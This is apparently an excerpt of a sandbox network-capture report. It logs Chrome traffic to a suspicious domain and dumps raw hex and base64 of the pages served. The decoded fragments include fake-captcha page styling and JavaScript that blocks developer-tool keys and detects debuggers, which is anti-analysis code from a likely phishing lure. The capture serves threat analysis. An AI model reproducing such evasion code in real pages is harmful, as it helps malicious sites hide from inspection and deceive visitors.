                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 45 77 4d 43 55 37 44 51 6f 67 49 43 41 67 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 57 63 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 77 30 4b 49 43 41 67 49 47 31 68 63 6d 64 70 62 69 31 69 62 33 52 30 62 32 30 36 49 44 45 77 63 48 67 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4e 76 62 6e 52 6c 62 6e 51 67 61 57 35 77 64 58 51 67 65 77 30 4b 49 43 41 67 49 48 64 70 5a 48 52 6f 4f 69 42 6a 59 57 78 6a 4b 44 45 77 4d 43 55 67 4c 53 41 79 4d 48 42 34 4b 54 73 4e 43 69 41 67 49 43 42 77 59 57 52 6b 61 57 35 6e 4f 69 41 31 63
                                                                                                                                                                                                                                  Data Ascii: ogICAgd2lkdGg6IDEwMCU7DQogICAgbWFyZ2luLXRvcDogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbWcgew0KICAgIHdpZHRoOiAxMDAlOw0KICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQp9DQoNCi5jYXB0Y2hhLWNvbnRlbnQgaW5wdXQgew0KICAgIHdpZHRoOiBjYWxjKDEwMCUgLSAyMHB4KTsNCiAgICBwYWRkaW5nOiA1c
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43
                                                                                                                                                                                                                                  Data Ascii: rZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KIC
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 52 6b 55 56 56 56 55 6e 70 57 5a 6c 63 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 4e 72 52 48 6c 46 62 6c 70 6e 5a 6e 45 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 45 4e 72 52 48 6c 46 62 6c 70 6e 5a 6e 45 67 4c 53 42 45 5a 46 46 56 56 56 4a 36 56 6d 5a 58 49 44 34 67 65 6c 70 58 52 6d 4e 6e 56 6b 35 53 5a 53 41 6d 4a 69 41 68 55 57 6c 74 56 6c 64 31 54 56 68 6f 63 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41
                                                                                                                                                                                                                                  Data Ascii: KSB7DQogICAgICAgIGNvbnN0IERkUVVVUnpWZlcgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IENrRHlFblpnZnEgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKENrRHlFblpnZnEgLSBEZFFVVVJ6VmZXID4gelpXRmNnVk5SZSAmJiAhUWltVld1TVhocykgew0KICAgICA
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 57 64 42 51 55 46 5a 51 55 46 42 51 55 64 42 51 30 46 4e 51 55 46 42 51 31 52 48 56 56 64 4f 51 55 46 42 51 55 6c 48 54 6b 6c 56 61 7a 42 42 51 55 68 76 62 55 46 42 51 30 46 6f 51 55 46 42 4b 32 64 42 51 55 46 4a 52 47 39 42 51 55 49 78 54 55 46 42 51 54 5a 74 51 55 46 42 52 48 46 5a 51 55 46 42 57 47 4e 4b 65 54 5a 56 56 48 64 42 51 55 46 47 65 46 56 46 65 46 56 53 55 55 46 42 51 55 77 34 5a 30 6c 51 4b 79 39 42 54 55 31 72 53 45 31 56 61 55 68 7a 56 57 70 4a 54 56 56 70 53 44 68 56 61 55 67 34 56 57 70 49 4f 46 6c 71 53 44 68 4e 61 55 68 32 65 54 68 42 4c 33 45 34 51 58 5a 35 4f 45 4a 6d 64 54 68 43 55 48 45 35 51 53 39 31 4f 45 4a 51 64 54 64 43 54 56 46 70 53 44 68 52 62 45 63 76 64 54 6c 43 55 48 6b 34 51 53 38 72 4c 30 46 4e 59 32 70 49 63 6a 68 6e
                                                                                                                                                                                                                                  Data Ascii: WdBQUFZQUFBQUdBQ0FNQUFBQ1RHVVdOQUFBQUlHTklVazBBQUhvbUFBQ0FoQUFBK2dBQUFJRG9BQUIxTUFBQTZtQUFBRHFZQUFBWGNKeTZVVHdBQUFGeFVFeFVSUUFBQUw4Z0lQKy9BTU1rSE1VaUhzVWpJTVVpSDhVaUg4VWpIOFlqSDhNaUh2eThBL3E4QXZ5OEJmdThCUHE5QS91OEJQdTdCTVFpSDhRbEcvdTlCUHk4QS8rL0FNY2pIcjhn
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 5a 32 4e 7a 49 33 4f 48 68 6a 4c 7a 56 51 4d 6a 63 35 4f 54 5a 57 63 58 64 6c 53 46 6f 7a 59 6e 63 30 55 57 51 77 57 44 56 73 5a 69 38 7a 59 6c 42 36 62 69 39 72 62 58 5a 6a 54 69 39 4d 57 69 39 78 5a 56 41 32 62 58 64 61 4e 6e 6f 72 64 7a 6c 6c 55 43 39 30 5a 31 59 7a 4e 47 46 4c 54 55 6f 35 63 54 6b 72 4e 30 68 43 5a 7a 45 32 4c 33 46 6d 51 58 64 44 4e 54 45 34 62 57 56 4f 52 44 64 47 5a 7a 52 4d 62 6b 67 72 56 6c 46 50 52 32 52 6a 65 44 68 51 62 6c 67 72 57 6a 52 43 55 47 55 35 65 47 67 33 56 6e 6f 30 57 6b 39 32 4f 48 6c 33 59 57 56 46 65 69 74 33 4f 55 5a 49 55 43 74 34 55 6a 56 78 4e 6d 74 6c 61 53 39 5a 5a 47 70 36 63 69 39 5a 64 7a 5a 4c 5a 6c 52 68 4f 55 59 76 5a 6b 5a 6d 5a 6e 64 6e 59 53 74 70 59 6a 52 6b 54 6c 46 6d 4c 79 39 58 53 46 46 51 51
                                                                                                                                                                                                                                  Data Ascii: Z2NzI3OHhjLzVQMjc5OTZWcXdlSFozYnc0UWQwWDVsZi8zYlB6bi9rbXZjTi9MWi9xZVA2bXdaNnordzllUC90Z1YzNGFLTUo5cTkrN0hCZzE2L3FmQXdDNTE4bWVORDdGZzRMbkgrVlFPR2RjeDhQblgrWjRCUGU5eGg3Vno0Wk92OHl3YWVFeit3OUZIUCt4UjVxNmtlaS9ZZGp6ci9ZdzZLZlRhOUYvZkZmZndnYStpYjRkTlFmLy9XSFFQQ
                                                                                                                                                                                                                                  2024-12-18 19:28:13 UTC1369INData Raw: 7a 4b 79 74 36 4f 45 74 44 59 55 52 47 56 55 51 30 4c 7a 5a 6e 53 43 73 72 59 54 67 33 4e 46 46 45 53 43 38 76 4e 56 42 4c 55 55 5a 56 52 30 4a 4d 64 32 39 34 4d 32 64 32 4c 79 73 33 52 58 68 51 5a 79 74 47 61 56 52 4a 5a 45 68 32 57 47 39 46 61 45 4e 55 4b 7a 5a 42 5a 44 55 35 4e 7a 67 32 5a 48 6c 42 51 32 46 45 54 57 77 72 4b 7a 46 4c 52 31 70 51 65 57 39 43 63 47 70 36 52 58 67 35 51 57 74 54 53 48 42 42 56 56 46 4e 51 32 5a 75 55 6b 52 4d 52 47 64 4b 65 55 64 42 53 47 74 51 61 55 4e 33 5a 31 6c 72 64 6b 74 71 52 6a 4a 45 52 6c 51 78 53 55 46 4d 57 57 4a 72 53 6a 68 6f 62 46 4e 4e 4e 6c 42 58 62 30 45 78 55 44 4a 72 51 6d 78 43 61 6c 4e 50 52 55 6c 58 55 58 64 79 4f 47 46 42 57 46 6b 34 53 6b 31 5a 55 55 6c 6a 61 47 78 54 64 47 74 4e 53 31 52 43 61 6a
                                                                                                                                                                                                                                  Data Ascii: zKyt6OEtDYURGVUQ0LzZnSCsrYTg3NFFESC8vNVBLUUZVR0JMd294M2d2Lys3RXhQZytGaVRJZEh2WG9FaENUKzZBZDU5Nzg2ZHlBQ2FETWwrKzFLR1pQeW9CcGp6RXg5QWtTSHBBVVFNQ2ZuUkRMRGdKeUdBSGtQaUN3Z1lrdktqRjJERlQxSUFMWWJrSjhobFNNNlBXb0ExUDJrQmxCalNPRUlXUXdyOGFBWFk4Sk1ZUUljaGxTdGtNS1RCaj


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  22192.168.2.1649735151.101.66.1374436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:15 UTC619OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                  Host: code.jquery.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://32.ergeane.ru/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 89501
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:16 GMT
                                                                                                                                                                                                                                  Age: 3071628
                                                                                                                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740038-EWR
                                                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 2774, 6
                                                                                                                                                                                                                                  X-Timer: S1734550096.084147,VS0,VE0
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  23192.168.2.1649734104.21.32.2254436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:16 UTC1314OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                  Host: 32.ergeane.ru
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
